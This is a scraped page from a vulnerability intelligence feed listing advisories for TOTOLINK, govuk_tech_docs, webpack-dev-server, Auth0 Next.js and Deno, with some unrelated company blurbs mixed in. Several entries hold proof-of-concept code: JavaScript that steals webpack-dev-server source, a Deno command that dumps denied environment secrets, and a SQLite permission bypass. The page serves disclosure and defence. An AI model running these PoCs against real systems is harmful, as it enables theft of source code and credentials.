Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
CVE-2024-22529 |
Description: TOTOLINK X2000R_V2 V2.0.0-B20230727.10434 has a command injection vulnerability in the sub_449040 (handle function of formUploadFile) of /bin/boa.
EPSS Score: 2.64% SSVC Exploitation: none
June 4th, 2025 (4 days ago)
|
|
CVE-2024-22048 |
Description: govuk_tech_docs versions from 2.0.2 to before 3.3.1 are vulnerable to a cross-site scripting vulnerability. Malicious JavaScript may be executed in the user's browser if a malicious search result is displayed on the search page.
CVSS: MEDIUM (6.1) EPSS Score: 1.18% SSVC Exploitation: none
June 4th, 2025 (4 days ago)
|
|
Description: [AI generated] "V² Development" is a comprehensive real estate development company that specializes in various aspects of real estate sectors, including residential, commercial, and industrial development. The company prides itself on creating sustainable and innovative solutions to meet the evolving needs of their clients. V² Development focuses on successful property development projects through insightful investment strategies, implying extensive market research and reliable partnership formations.
June 4th, 2025 (4 days ago)
|
|
|
Description: As a leader in real estate development in Quebec, Groupe Devimco has been designing and creating unique and mixed-use living environments for 30 years.
Revenue 2024 : $ 44 M
June 4th, 2025 (4 days ago)
|
|
Description: Summary
Source code may be stolen when you access a malicious web site.
Details
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.
By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.
PoC
Download reproduction.zip and extract it
Run npm i
Run npx webpack-dev-server
Open https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
You can see the source code output in the document and the devtools console.
The script in the POC site is:
let moduleList
const onHandlerSet = (handler) => {
console.log('h', handler)
moduleList = handler.require.m
}
const originalArrayForEach = Array.prototype.forEach
Array.prototype.forEach = function forEach(callback, thisArg) {
callback((handler) => {
onHandlerSet(handler)
})
originalArrayForEach.call(this, callback, thisArg)
Array.prototype.forEach = originalArrayForEach
}
const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const ...
CVSS: MEDIUM (5.3) EPSS Score: 0.03%
June 4th, 2025 (4 days ago)
|
|
|
Description: Summary
Source code may be stolen when you access a malicious web site with non-Chromium based browser.
Details
The Origin header is checked to prevent Cross-site WebSocket hijacking from happening which was reported by CVE-2018-14732.
But webpack-dev-server always allows IP address Origin headers.
https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127
This allows websites that are served on IP addresses to connect WebSocket.
By using the same method described in the article linked from CVE-2018-14732, the attacker get the source code.
related commit: https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb (note that checkHost function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.
This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to the non-HTTPS private access blocking feature.
PoC
Download reproduction.zip and extract it
Run npm i
Run npx webpack-dev-server
Open http://{ipaddress}/?target=http://localhost:8080&file=main with a non-Chromium browser (I used Firefox 134.0.1)
Edit src/index.js in the extracted directory
You can see the content of src/index.js
The script in the POC site is:
window.webpackHotUpdate = (...args) => {
console.log(...args);
for (i in args[1]) {
document.body.innerText = args[1][i].toString() + document.body.innerText
console.log(args...
CVSS: HIGH (7.5)
June 4th, 2025 (4 days ago)
|
|
|
Description: Overview
In Auth0 Next.js SDK versions 4.0.1 to 4.6.0, __session cookies set by auth0.middleware may be cached by CDNs due to missing Cache-Control headers.
Am I Affected?
You are affected by this vulnerability if you meet the following preconditions:
Applications using the NextJS-Auth0 SDK, versions between 4.0.1 to 4.6.0,
Applications using CDN or edge caching that caches responses with the Set-Cookie header.
If the Cache-Control header is not properly set for sensitive responses.
Fix
Upgrade auth0/nextjs-auth0 to v4.6.1.
References
https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-f3fg-mf2q-fj3f
https://github.com/auth0/nextjs-auth0/commit/12a62ca596db3b0827b39a4b865b882423e7cb1e
https://github.com/advisories/GHSA-f3fg-mf2q-fj3f
June 4th, 2025 (4 days ago)
|
|
|
Description: Summary
The Deno.env.toObject method ignores any variables listed in the --deny-env option of the deno run command. When looking at the documentation of the --deny-env option this might lead to a false impression that variables listed in the option are impossible to read.
PoC
export AWS_SECRET_ACCESS_KEY=my-secret-aws-key
# Works as expected. The program stops with a "NotCapable" error message
echo 'console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));' | deno run \
--allow-env \
--deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -
# All enviroment variables are printed and the --deny-env list is completely disregarded
echo 'console.log(Deno.env.toObject());' | deno run \
--allow-env \
--deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -
The first example using get exits with the following error:
error: Uncaught (in promise) NotCapable: Requires env access to "AWS_SECRET_ACCESS_KEY", run again with the --allow-env flag
console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));
^
at Object.getEnv [as get] (ext:deno_os/30_os.js:124:10)
at file:///$deno$stdin.mts:1:22
The second example using toObject prints all environment variables:
[Object: null prototype] {
...
AWS_SECRET_ACCESS_KEY: "my-secret-aws-key",
...
}
Impact
Software relying on the combination of both flags to allow access to most environment variables except a few sensitive ones will be vulnerable to malicious code trying to steal secrets using the Deno.env.toObject() meth...
June 4th, 2025 (4 days ago)
|
|
|
Description: Summary
The Deno.env.toObject method ignores any variables listed in the --deny-env option of the deno run command. When looking at the documentation of the --deny-env option this might lead to a false impression that variables listed in the option are impossible to read.
PoC
export AWS_SECRET_ACCESS_KEY=my-secret-aws-key
# Works as expected. The program stops with a "NotCapable" error message
echo 'console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));' | deno run \
--allow-env \
--deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -
# All enviroment variables are printed and the --deny-env list is completely disregarded
echo 'console.log(Deno.env.toObject());' | deno run \
--allow-env \
--deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -
The first example using get exits with the following error:
error: Uncaught (in promise) NotCapable: Requires env access to "AWS_SECRET_ACCESS_KEY", run again with the --allow-env flag
console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));
^
at Object.getEnv [as get] (ext:deno_os/30_os.js:124:10)
at file:///$deno$stdin.mts:1:22
The second example using toObject prints all environment variables:
[Object: null prototype] {
...
AWS_SECRET_ACCESS_KEY: "my-secret-aws-key",
...
}
Impact
Software relying on the combination of both flags to allow access to most environment variables except a few sensitive ones will be vulnerable to malicious code trying to steal secrets using the Deno.env.toObject() meth...
June 4th, 2025 (4 days ago)
|
|
|
Description: Summary
It is possible to bypass Deno's read/write permission checks by using ATTACH DATABASE statement.
PoC
// poc.js
import { DatabaseSync } from "node:sqlite"
const db = new DatabaseSync(":memory:");
db.exec("ATTACH DATABASE 'test.db' as test;");
db.exec("CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);");
$ deno poc.js
References
https://github.com/denoland/deno/security/advisories/GHSA-8vxj-4cph-c596
https://github.com/denoland/deno/commit/31a97803995bd94629528ba841b2418d3ca01860
https://github.com/advisories/GHSA-8vxj-4cph-c596
June 4th, 2025 (4 days ago)
|